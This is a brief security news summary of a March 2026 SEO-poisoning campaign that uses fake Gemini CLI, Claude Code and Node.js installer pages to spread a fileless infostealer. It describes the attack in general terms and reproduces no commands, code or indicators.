Hackers Use SEO Poisoning to Fake Gemini CLI and Claude Code Installers

A financially motivated campaign observed in March 2026 is poisoning search results for developer tools (e.g., Gemini CLI, Claude Code, Node.js) with typosquatted domains that host fake installation pages; victims who run the provided PowerShell commands load a heavily obfuscated, fileless infostealer that disables ETW/AMSI, harvests browser credentials, tokens, SSH keys, collaboration and cloud data, and exfiltrates it to attacker-controlled servers. The operation uses many spoofed domains and bulletproof hosting, installs legitimate tooling in parallel to mask compromise, and the report includes over 30 related domains and numerous SHA-256 hashes as indicators of compromise.